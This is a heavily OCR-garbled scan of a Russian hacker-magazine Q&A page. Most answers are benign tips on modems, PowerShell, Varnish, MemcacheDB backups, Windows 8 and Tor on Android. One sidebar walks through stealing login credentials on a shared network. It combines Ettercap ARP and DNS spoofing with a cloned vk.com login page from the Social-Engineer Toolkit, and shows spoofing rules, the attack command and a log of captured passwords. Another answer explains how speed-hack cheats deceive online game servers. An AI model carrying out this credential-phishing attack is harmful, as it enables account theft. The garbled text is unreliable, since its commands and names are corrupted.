Данная программа, как понятно из назва- 
ния, предоставляет графический интерфейс 
для управления модемом. Среди функций 
приложения нужные тебе — это выполне- 
ние 11550 и просмотр СМС, а также выбор 
сети, просмотр статуса устройства (включая 
уровень сигнала) и учет трафика. 

□ Неоднократно встречал читерские 
программы, СЬа^Епдіпе например, 
которые ускоряют игры и приложения. 

Какой принцип работы этих программ? 

Как ты знаешь, очень многое, включая 
анимацию, в играх и приложениях 
привязано к времени. Так вот, ускоряя течение 
системного времени для конкретного 
процесса, эти программы создают иллюзию 
ускорения программ. Широкое применение 
эти программы нашли для обмана онлайн-игр: 
если формирование отсчета времени идет 
на клиенте, а все данные, идущие от него, 
не проверяются на сервере, то можно 
обмануть («ускорить») клиент, а он, в свою 
очередь, обманет сервер. В результате твой 
персонаж двигается, восстанавливается. 




ЕТТЕКСАР + 5ЕТ: ПОЛУЧАЕМ ЛОГИН И ПАРОЛЬ ОТ АККАУНТА ЮЗЕРА 



Посредством АРР-зрооЛпд и 0М$-5роо^іпд 
атак мы можем «видеть» весь незашифро- 
ванный трафик пользователя, который сидит 
с нами в общей \Л/і-Рі- (и не только ѴѴі-Рі) сети. 
Но что, если нам нужно достать логин/па- 
роль, а вход в аккаунт происходит по НТТР5? 
Так вот, при условии, что сама страница вхо- 
да идет по НТТР (как, например, на ІасеЬоок. 
сот, ѵк.сот, таіі.ги), перехват данных 
пользователя становится легко осуществим. 
Посмотрим, как это сделать, на примере 
ѵк.сот. Будем использовать ЕУегсар и 5осіаІ- 
ЕпдіпеегТооІкіІ (5ЕТ) ( Ыиу/5осЕпдТооІ 1. 



Пропусти этот шаг, если ты использу- 
ешь дистрибутив ВаскТгаск (в нем все 
уже установлено и настроено). Для 
начала нужно установить необходимые тулзы. 
Установка Еиегсар тривиальна, так как он есть 
в репозиториях. Для установки же 5ЕТ выпол- 
ни из папки, куда хочешь его установить: 

5ѴП со И-С1р://5ѵп.-Сги5'СесІ5ес.сот/.-< 
50сіа1_еп§іпеегіп8_^оо1кі-С зеХ/ 

После этой команды требуется настройка на 
работу со сторонними проектами, но в нашем 
случае достаточно чистого 5ЕТ. 



Перейди в папку с 5ЕТ и запусти его: 
«./5еи>. На ругательства о невоз- 
можности найти путь к Меіазріоіі 
не обращай внимания: нам он сейчас не нужен. 
Выбирай вектор атаки: «1) 5осіаІ-Епдіпеегіпд 
Аиаскв -► 2) ѴѴеЬзіІе Аиаск Ѵесіогз -► 

3) Сгесіепііаі Нагѵезіег Аиаск МеіЬоб -♦ 

2) 5і1е СІопег». ІР-адрес для обратного Р05Т- 
запроса — вводи свой ІР'шник, а в качестве 
иВЕ-адреса сайта для клонирования — Ьир:// 
ѵк.сот. Сейчас 5ЕТ поднял НТТР-сервер 
с копией страницы входа, все Р05Т-запросы 
с которой будут перехвачены 5ЕТ'ом. 
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Вопросы и ответы 



получает бонусы, стреляет и так далее 
быстрее. 



□ Можно ли с помощью РоѵѵегБЬеІІ 
сжать ірд-файлы? 

□ Да, для этого можно использовать 
модуль РЗІтаде ( Ыі.Іѵ/Р5Ітаде 1. 
Установка модуля представляет собой простое 
копирование его в папку с модулями: С:\ 

ѴѴ і п сі о\л/з\5у 5Іе т32\\^ і п б ОѴѴ5 Роѵѵе г5 Ь е I І\ѵ 1 . 0\ 
Мосіиіев. Но кроме этой папки, можно 
использовать и другие — для этого настрой 
переменную окружения РЗМобиІеРаІЬ. 

Если модуль установлен, остается лишь 
написать скрипт. Ах да, не совсем понятно, 
что ты имел в виду под сжатием: сниже- 
ние качества или уменьшение в размерах? 

Но для РБІтаде эти задачи выполняются с аб- 
солютно одинаковой сложностью. Так что мы 
реализуем две! 



КАК СЭКОНОМИТЬ НА ОБЛАЧНОМ ХОСТИНГЕ? 




ПЛАНИРУЮ ПЕРЕНЕСТИ СВОЙ ПРОЕКТ НА ОБЛАКО, НО ВОЗНИКАЕТ 
ВОПРОС: НЕ БУДЕТ ЛИ ЭТО СЛИШКОМ ДОРОГО? КАК СЭКОНОМИТЬ 
НА ОБЛАЧНОМ ХОСТИНГЕ? 

С облаком ты платишь только за ресурсы, которые используются. Поэтому 



Ы для экономии весь статический контент желательно перенести на СОМ: 

отдавать через АрасЬе (либо другой веб-сервер) слишком дорого. Особен- 
ностью многих облачных хостингов является наличие НТТР-акселератора ѴагпізЬ- 
СасЬе ( Ыиѵ/ѴагпІ5ЬСасЬе 1. который первым обрабатывает все запросы посетителя. 
Если он не находит запрашиваемую страницу в своем кеше, то запрос передается 
к АрасНе. Так вот, все запросы, на которые ответил ѴагпівЬ, не тарифицируются. Но 
для его эффективного использования нужно знать пару особенностей. Во-первых, 
ѴагпівН не кеширует страницы, для которых явно не задан заголовок СасЬе-СопІгоІ. 
Во-вторых, ѴагпівИ не кеширует контент, предназначенный посетителям, для кото- 
рых запущена сессия, поскольку предполагает, что они каким-то образом персони- 
фицированы. Хотя это и не мешает кешировать статику и для таких страниц: 



ітрогіі-тосіиіе іта§е 



$5гс="0:\іта§е5" 

$сІ5-Ь=’'0: \5та11_іта8е5" 

тсі $сІ5-С --Рогсе 

$61-І:ег = пем-Іта§ебІТег ( 

АсІсІ-БсаІеРіІ'Сег -равзТИги -ИеійІтС 200 
-місНІі 65535 I АсІсІ-СопѵегзіопРіІТег 
-раззТЬги -ТуреМате зр§ -диаШ:у 50 
Се-Ь-Ітабе $5гс\*ор§ | 5е1:-Іта§еРі11:ег «-• 
-ЯИег $б11:ег | 5аѵе-іта§е -бІеМате ^ 
{$_.Ри1ІМате -геріасе "оР8$"л ^ 
’*-5та11о'Р8"} тоѵе-і1:ет $5гс\*-5та11.^ 
ЗРб $сІ5Т --Рогсе 

Здесь мы пережимаем ЗРЕБ с качеством 50 
и меняем высоту каждого изображения до 200 
пикселей. Значение ширины 65535 означает, 
что изменяться она будет пропорционально 
высоте. 

Мой веб-проект активно развивается, 
нагрузка возрастает с большой 
скоростью. Для хранения данных веб- 




5иЬ ѵс1_гесѵ { ... 

і-Р (гед.игі ~ "(?і)\*(рпбІЕІ'^13Ре8ІЗР8Іісо|5м-Р|с55|з5|ІтСт1|Іі1:т) 
(\?[а-20-9]+)?$") { 

ипзеі: гер.ІтС-Ср.Соокіе; 

} 

} 






Далее нужно внушить юзеру, что 
его любимый сайт хостится на твоей 
машине. Для этого проведем 0МБ- 


□ 


На этом настройка Еиегсар законче- 
на, и можно запускать ОМБ-зроо^іпд. 
Для этого в новой вкладке терминала 





зроо^іпд-атаку с помощью Еііегсар. По правде 
говоря, БЕТ можно настроить на автоматиче- 
скую работу с Еиегсар, но для понимания сути 
процесса мы настроим Еиегсар для проведе- 
ния атаки вручную. Открываем файл еііег.сіпз 
(/изг/зЬаге/еиегсар/) и добавляем в него такие 
правила подмены: 

ѵк.сот А 192.168.1.3 
♦.ѵк.сот А 192.168.1.3 

где 192.168.1.3 замени на свой ІР. 



(так как в текущей вкладке висит БЕТ, ожидая 
запросов на поднятый им же сервер) выполни: 

# еТТегсар -Т -д -і м -Р с1п5_5роо-Р «-> 

-М агрігетоТе /192.168.1.1/ // 

Здесь через параметр -Р указываем выпол- 
нение плагина с1п5_5роо!; 192.168.1.1 — адрес 
шлюза. Во второй паре слешей можно указать 
ІР'шник конкретной жертвы, если же его не ука- 
зать, то будем атаковать всех в сети. 



Теперь возвращаемся на вклад- 
ку с БЕТ'ом и ждем, когда жертва 
«предоставит» нам свои аутентифи- 
кационные данные. БЕТ в реальном времени 
будет выводить перехваченные учетки. Когда 
нужное получено, останавливаем Еііегсар 
(нажатием клавиши <д>). А потом на вкладке 
с БЕТ нажимаем <СігІ + С>, чдм останавливаем 
перехват данных и формируем отчет. Напомню, 
что все вышеописанные действия можно про- 
водить только с исследовательскими целями 
и только в своей сети. Во всех остальных 
случаях эти действия противозаконны. 
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приложений хочу попробовать использовать 
МетсасЬеОВ (не путать с МетсасЬесІ). 
Подскажи, как делать бэкапы из этой БД? 

Для хранения данных на диске 
МетсасЬеОВ использует одну из ста- 
рейших и надежнейших кеу-ѵаіие (пары 
ключ-значение) реляционной СУБД — 

Вегкіеу ОВ. Поэтому для бэкапа данных 
из МетсасЬеОВ нужно пользоваться теми 
же инструментами, что и для бэкапа 
из Вегкіеу ОВ. Это инструменты бЬ_битр 
и сіЬ_Іоасі из пакета сІЬ-иІіІ. Помимо этого, 
для восстановления поврежденной БД можно 
использовать сіЬ_гесоѵег, а для проверки 
целостности — сІЬ_ѵегі(у. 

Для того чтобы сделать бэкап, выполни 
команду: 

$ с1Ь_с1итр -Ь /и5г/1оса1/тетсасЬесІЬ 
сІаТа.сІЬІ § 2 ір > тетсасЬес1Ь.с1итр.§2 

Через опцию -Ь передаем путь к рабочей 
директории с базой данных, бгір используем 
для сжатия в связи с тем, что переносимый 
дамп в текстовом виде получается очень боль- 
шим. Для восстановления перейди в пустую 
директорию, в которую его нужно произвести, 
и выполни: 

$ 2 саТ тетсасЬесІЬ.сІитр.§ 2 І с1Ь_1оас1 
сІаТа.сІЬ 

Нужно сказать, что утилита сіЬ_сіитр ра- 
ботает очень медленно, да и дамп получается 
больше, чем сам файл БД. Для быстрого бэка- 
па можно использовать утилиту сІЬ_ЬоіЬаскир. 

В отличие от бЬ_битр, она копирует целый 
слепок базы. Использовать ее можно так: 

$ сІЬ^Ьо-СЬаскир -Ь /и5г/1оса1/«-^ 
тетсасЬесІЬ -Ь /тпІ/Ьаскир/-^ 
тетсасЬ(1Ь_Ьаскир 

Этой командой производится быстрое 
резервное копирование. Для восстановления 
достаточно скопировать в пустую директорию 
содержимое директории, созданное утилитой 
бЬ_ЬоіЬаскир. 

Установил \Ѵіп(іо\ѵ5 8 на ПК. Первое 
впечатление приятное, но прежде, чем 
покупать таблет с «восьмеркой», хочется 
испробовать заточенность оси под сенсорное 
управление. Что посоветуешь? 

Для испытания ты можешь заюзать 
Апсігоігі-планшет или іРаб, что-то одно 
из них точно есть у тебя или у одного из твоих 
друзей. Понятное дело, мы не можем устано- 
вить «восьмерку» на эти девайсы, мы 
поступим иначе, и поможет нам в этом 
программа БрІазЫор 2 — Яетоіе Оевкіор. 

Она распространяется бесплатно для Апбгоіб 
( Ыиѵ/5рІа5Ьіоо2 І и стоит 2,99 доллара для іРасі 
( Ьіиу/5рІа5Ыор2і05 І. Кроме программы 
и планшета, нам понадобится еще компьютер 
с установленной «восьмеркой» (виртуальная 
машина тоже сойдет, но в ее настройках. 



|[*] нагѵміег І5 геаду, Ьаѵ* ѵісііп Ьгоим Іо уоиг *и«. 
І192.Ш.1.4 - - [14/0ес/2в12 Ѳ9:23;59] "СЕТ / НТТР/1.1" 2ѲѲ - 

1192. 168. 1.3 ■ - [14/Овс/2Ѳ12 89:27:11] "СЕТ / НТТР/1.1" 2ѲѲ -| 

192.168.1.3 • - [14/0вс/2812 89:29:24] "СЕТ / НПР/1.Г 288 - 

192.168.1.3 - - [14/0вс/2812 89:38:27] "СЕТ / НПР/1.1" 288 - 

[*] НЕ СОТ А Н1ТІ Ргіпігпд СЬе оиІриС ^ 

Р065ІВІЕ ОбЕРНАИЕ ГІЕЮ ГОЦМ): ас1>Іод1п 

РАйАИ- мрігр-. I 

г* 

№АйАН‘ сврГсЬа.ѵ^ - I 

г.-.-лн; '/ѵк. - 

; ір Ьгяв?е^?(М1481)6140' 

Р066ІВІЕ ОЗЕРН/^ ЕІЕЦ) РООНО: •паіі-іодіпеиви.ги I 

Р0331ѲІЕ РА53ИОКО ГІЕЮ РООМ): р««&=рв$$иог6 

[*] МНЕН ѴОи'РЕ Рімізнео, НІТ сонтиоі-с то семейате а рерорт.] 



[•] НС сот А НІТ1 Ргіпііпр ТЬв оиіроі: 

Р055І8І.Е ЦЗЕРНАНЕ РIЕ^^ РООНО; всІ»Іодіп 
рдядн - - ' - - : • . 

■ е*ргге- 
р&олм: ;арІ-’ : 

г.-гѵ: 

|: г Мір;///- .сап 

Р055ІВІЕ ОЗЕРНАМЕ Р1ЕЮ РООНО: епаіЬѵісипвпаа.ги 

РОЗЗІВІЕ РАЗЗЫОРО РІЕЮ РОО»: ра$5=12343я»ег1у 

[*] МНЕН ѴОО’РЕ Р1НІЗНЕО. НІТ СОНТРОІ-С ТО СЕНЕРАТЕ А РЕРОРТ. 




5ЕТ перехватывает учетки 

в разделе «Сеть», установи режим работы 
в «Сетевой мост» и перезагрузи машину). 

На «восьмерку» устанавливаем Бріазбіор 
Бігеатег ( Ьі1.Іу/5Т-5ігеатег ) и заводим себе 
бесплатный аккаунт. Следующим шагом 
запускай БрІазЫор на планшете, логинься 
на только что созданный аккаунт: откроется 
список компьютеров, доступных к подключе- 
нию. В этом списке ты должен увидеть свой 
компьютер с запущенным стримером. К нему 
и подключайся. Теперь можешь тестить. 
Конечно, это совсем не то, что будет на реаль- 
ной восьмерочной таблетке. Кроме понятных 
тормозов из-за стриминга, сам по себе 
БрІазЫор всего лишь удаленно контролирует 
курсор, так что ты не сможешь насладиться 
всеми прелестями реального тачскрина, 
но некоторые операции работают достаточно 
хорошо. Тем не менее такой опыт использова- 
ния ѴѴіпсІоѵѵв 8, как мне кажется, для покупки 
планшета более познавательный, чем 
щелканье мышкой на ПК. 

Как настроить количество строчек 
в новом пуске «восьмерки»? 

В стандартных настройках это сделать 
невозможно, но такую настройку можно 
произвести в реестре ѴѴіпсІоѵѵз. Нажми <ѴѴіп + 
Р> и запусти гедесііі. Переходи в ветку: 

НКСи\5оТТмаге\Місго5оТТ\МіпсІом5\ 

Сиггеп1:Ѵег5Іоп\Іттег5іѵе5Ье11\Сгіс1 

Найди там ОѴѴОРО-запись с ключом ’ІауоиІ_ 
МахітитРоѵѵСоипТ, если ее нет, то создай. 

Она и отвечает за количество строчек. Чтобы 
увидеть результат изменений, достаточно 
перелогиниться. 

В одном из прошлых номеров рассказы- 
валось о том, как пустить весь трафик 
Ііпих через Тог. А как сделать это для Апсігоісі? 

На сайте проекта Тог есть его версия 
для Апсігоіс) — ОгЬоІ ( ЬіІ.Іѵ/ОгЬоП . 










Он включает в себя собственно Тог, ІіЬеѵепІ 
и ргіѵоху. Для нерутованных девайсов нужно 
настроить используемое ПО на локальный 
прокси-сервер, который предоставляет ОгЬоІ 
(НТТР и 50СК54А/5). Для девайсов же с рутом 
и прошивкой, которая поддерживает ІРТаЫез 
(СуаподепМосі, например), ОгЬоІ можно 
настроить для перенаправления всего 
ТСР-трафика через Тог. 

□ Часто приходится сидеть в открытых 
вайфаях со своего лаптопа. Как проще 
всего заставить сайты работать через НТТР5, 
в случае если это возможно? 

Для этого проще всего использовать 
расширения браузеров. Для СЬготе 
и Рігеіох существует НТТР5 ЕѵегуѵѵЬеге ( ЬіЕІу/ 
Ь»р 5 -еѵѵНеге ). Для Орега можно использовать 
$\л/І 55 Кпі(е ( Ьіі.Іу/5\л/І55-Кпі(е ) или Ребігесі Іо 
НТТР5 ( Ьі1.Іу/Ресі2Нир5 ). Еще один вариант 
для СЬготе — КВ 551 Еп(огсег ( Ыиу/КВ-551 ) 
и для Ріге(ох — НТТР5 Ріпбег ( ЬіІ.Іѵ/НТТР5- 
Ріпсіег ). 

На многих сервисах сейчас внедряют 
двухэтапную авторизацию. Хочется 
внедрить и у себя на сайте, но не изобретая 
велосипед, а используя боодіе Аи(Ьеп(іса(ог 
(он поддерживает несколько аккаунтов). 

Есть какой-то публичный АРІ? 

Соодіе АиіЬепІісаІог — это проект 
с открытым исходным кодом ( ЬИ.Іу/ 
БоодІеАиіЫ . Работает он по принципу ТОТР 
(Тіте-Ьазесі ОпеТіте Раззѵѵогсі). Вдобавок 
к открытости кода на странице проекта в РРС 
детально описан алгоритм формирования 
одноразового пароля (или токена). Так 
что написать серверную часть — лишь дело 
времени. На сегодняший день существует 
несколько готовых решений для основных 
языков программирования. Например, для РНР 
доступен даДрЬр ( сосіе.доодІе.сот/р/оа4рЬр ), 
для РуЬоп — опеіітеразз ( дііЬиЬ.сотЛасіеск/ 
опеЬтеразз ). а здесь — ЬіЫѵ/6А Э5 ты най- 
дешь решение для ^аѵа5сгірС Есть даже 
плагин для ѴѴогбРгезз ( Ыі.Іѵ/ѴѴР-6А І. Нужно 
сказать, что очень важно быть предельно осто- 
рожным при реализации двухфакторной аутен- 
тификации на своем сайте: например, 
не забудь убедиться в синхронности часов 
на сервере и клиенте, кроме того, что самое 
важное, постарайся не допустить возможности 
для проведения ЬгиІе(осе-атаки на токен, зс 
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иМІТ5/ѴѴѴѴ\/Ѵ2 



ѴѴѴѴѴѴ2 




Удобный способ наглядно представить габариты 
несколькихустройств 



5І2ЕА5У 



Бігеааѵ.сопг) 

При выборе ноутбука, смартфона, планшета или любого другого предмета (вплоть до мебели) 
ключевым вопросом часто оказываются физические размеры. Однако сухие цифры мало 
кому что-то говорят, и самый эффективный способ оценить габариты продукта — сравнить 
его с привычным предметом. Сервис зігеазу как раз позволяет визуально сравнить не- 
сколько предметов — для этого достаточно вбить его габариты в миллиметрах или дюймах. 
Увы, дизайн сервиса напрочь застрял в 2007-2008 году (почувствуй себя старым при про- 
чтении этой фразы), но со своей основной задачей он справляется отлично. Предметы можно 
рассмотреть в нескольких ракурсах (к сожалению, свободно повращать картинку не удаст- 
ся). Сервис позволяет сохранить свой список устройств и посмотреть чужие сравнения, 
но почему-то не позволяет найти габариты устройства по названию. 



В1.0СК5.0Р6 



Ы.оск^.огд 

Сервис представляет собой неплохую альтернативу традиционным разІеЬіп-сервисам 
для ^аѵа5сгір^кода. Идея в том, что код можно посмотреть «вживую» параллельно 
с собственно листингом. При этом сервис позволяет сопровождать код документацией 
на Магксіоѵѵп/НТМи использовать в примерах внешние ^5-библиотеки (при условии, 
что они хостятся где-то еще). В основе Ы.оскз.огд лежат дізі-файлы біЖиЬ'а, поэтому 
для работы с сервисом нужно зарегистрировать репозиторий. Код пишется непосред- 
ственно в дізСе в файле іпсіех.Ыт), который обрабатывается в Ы.оскз.огд, и на выходе 
получается ссылка на готовую страничку. Для быстрого доступа к функциям сервиса 
Инструмент, позволяющий «вживую» поснотреть^5-код имеются расширения ПОД РігеЪх, СЬготе и Орега. 





Простой сервис, показывающий ІР и другую информацию, 
доступный изтерминала 



ІРСОМРЮ.МЕ 



і^сопЛд.те 

Простейший сайт, позволяющий получить множество полезной информации, вро- 
де своего ІР, юзер-агента и не только. Важная особенность, отличающая КсопЛд.ппе 
от миллиарда аналогичных сайтов (не просто же так мы о нем заговорили), заключает- 
ся в возможности извлекать всю эту информацию с помощью сигі (входит в стандарт- 
ную поставку большинства дистрибутивов Ііпих, 05 X и множества других *піх-систем) 
в любом удобном формате (включая ХМІ и ^50N). Также можно вытаскивать ответы 
на конкретные запросы (например, только ІР или только используемый порт), что может 
оказаться полезным для различных скриптов. 




Дружелюбный сервис, позволяющий быстро набросатькод 
интерфейса на Воо($(гар 



0ІѴ5Н0Т 



гііѵзЬо^.сот 

Надеемся, тебе понравился материал в январском ][, посвященный ТѵуіПег Вооізігар — 
удобному и современному средству проектирования интерфейсов веб-сервисов. Увы, 
несмотря на всю простоту, фреймворк не избавляет разработчика от ручной работы. 
Кроме того, заготовки Вооізігар пригодятся неискушенному пользователю, которому 
понадобилось наглядно показать свою идею, — но для этого его нужно избавить от не- 
обходимости работать с кодом. ОіѵзЬоІ — молодой сервис для создания интерфейсов 
на базе Вооізігар, с его помощью можно достаточно быстро получить из набросков 
рабочий НТМ1/С55-КОД. Веб-интерфейс позволяет добавлять основные элементы и те- 
стировать прототип на различных форм-факторах (включая смартфоны и планшеты). 
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